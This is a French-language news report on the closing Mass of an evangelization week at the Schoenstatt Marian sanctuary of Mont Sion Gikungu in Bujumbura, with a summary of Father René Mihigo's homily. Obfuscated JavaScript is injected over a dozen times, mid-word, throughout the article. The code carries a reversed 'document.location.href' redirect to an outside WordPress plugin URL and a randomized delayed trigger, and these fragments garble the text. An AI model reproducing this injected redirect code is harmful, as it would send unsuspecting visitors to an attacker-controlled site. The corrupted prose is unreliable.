Ce vingt troisième dimanche du temps ordinaire a revêtu un caractère particulièrement spécial. C’était le dernier jour de la semaine d’évangélisation qui avait débuté mardi, le 3 août au sanctuaire marial de Schoenstatt à Mont Sion Gikungu. Cette évangélisation été initiée par le Foyer de Charité de Bujumbura en collaboration avec le Renouveau Charismatique Catholique (RCC) et le sanctuaire Marial de Mont Sion Gikungu. L’horaire de cette semaine pour les jours ouvrables durait 3h, de 16h à 19 h. Pour samedi, l’évangélisation a duré quatre heures et a commencé à 8h du matin. L’effectif de fidèles participants était élevé pour remplir toutes les places de l’église de la Sainte Trinité et une partie des escaliers autour de celle-ci.
Ce dimanche a vu une affluence tant de monde venu de plusieurs coins du pays, à commencer par ceux de la mairie de Bujumbura qui ont rempli la grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande église dédiée à la Sainte Trinité et tous les escaliers des alentours dès 8h du matin pour une célébration eucharistique prévue à 9h et demie. La cloche du début de la Messe a sonné qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and toutes les places qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnaient accès visuel à l’autel étaient complètement occupées. C’est alors que les membres des commissions protocole et ordre et sécurité ont eu tout le mal à pouvoir orienter les gens vers le gazon du devant du sanctuaire d’où l’on a eu toutes les peines pour voir ce qui se passe dans l’église. La célébration eucharistique du jour a été présidée par le Père Recteur du Sanctuaire marial de Schoenstatt de Mont Sion Gikungu en compagnie de six autres prêtres toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le Père Amtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Kana du Foyer de Charité et le Père René Mihigo Zachée venu de la RDC pour prêcher cette évangélisation.
Les lectures du dimanche ont été tirées du Livre de la Sagesse 9, 13-18 ; de l’Epitre de saint Paul à Philémon 9b-10. 12-17 et de l’Evangile selon saint Luc 14,25-33.
L’homélie du jour a été prêchée par le Père MIHIGO. Il a d’abord rappelé que tout au long de cette semaine l’on a contemplé la vierge Marie, la mère de Jésus notre Sauveur, et qui est en même temps notre mère. Elle nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné son Fils Jésus, et celui-ci nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné Marie sa mère avant de mourir sur la croix. ‘Puisque Jésus nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné Marie pour être notre mère, personne ne pourra nous séparer d’elle, tout comme personne ne pourra nous séparer de l’amour du Christ tel que saint Paul nous le précise’, a insisté le prédicateur du jour. Comme Marie a accepté d’être la servante du Seigneur, nous devons apprendre d’elle pour être à notre tour des serviteurs du Seigneur, nous et notre maison. Nous sommes de la famille de Dieu parce que nous avons eu le Saint Esprit qui nous fait dire ‘Abba’, Père ! le Livre du Deutéronome nous précise toutes les bénédictions que nous recevrons si nous observons les exigences requises pour un membre de cette famille. Au cas contraire, il va sans dire que les bénédictions deviendront des malédictions.
La première lecture nous a posé une question de savoir qui pourrait comprendre les plans de Dieu. Elle nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne en même temps la réponse, en nous disant que c’est seulement celui qui a la Sagesse divine, or Celle-ci c’est Jésus Lui-même. Nous sommes appelés à accueillir Jésus dans notre vie pour pouvoir accomplir la volonté du Père. ‘La Sagesse de Dieu ne s’acquiert pas par l’intelligence livresque, mais en lisant la Bible’, a précisé le Père René. Dans la deuxième lecture, saint Paul envoie Onésime à Philémon en lui demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andant de l’accueillir, non comme un esclave mais comme un frère. Nous comprenons alors qu’en Dieu nous sommes tous libres et égaux, même l’ennemi devient ami. Cela signifie en bref que nous devons avoir une vision positive du monde et des personnes.
L’Evangile nous présente une foule de gens qui suivaient Jésus pour différentes raisons : les uns veulent la guérison de leurs maladies, les autres veulent manger du pain, tout comme il y en a eu qui voulaient écouter sa Parole qui change leur vie. Suivre Jésus est exigeant car il nous demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande de laisser notre mari, notre femme, nos enfants et tous nos biens afin d’être libres à le suivre sans se détourner pour voir ce qu’on a laissé chez nous. Actuellement, nous ne devons pas nous empêcher de suivre Jésus à cause de nos téléphones, télévision, nos fétiches car ce sont des antivaleurs de la foi chrétienne. Comme nous célébrons la naissance de la vierge Marie, nous sommes sûrs qu’elle nous a préparé un beau gâteau, approchons-nous d’elle pour nous en régaler les beaux morceaux.
Précisons qu’après le chant d’action de grâce, il y a eu une prière pour les malades et beaucoup de personnes ont été délivrés tels que certains l’ont signifié à travers des témoignages. Cela s’est même produit dès le premier jour de cette évangélisation.
Nytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwi Méthode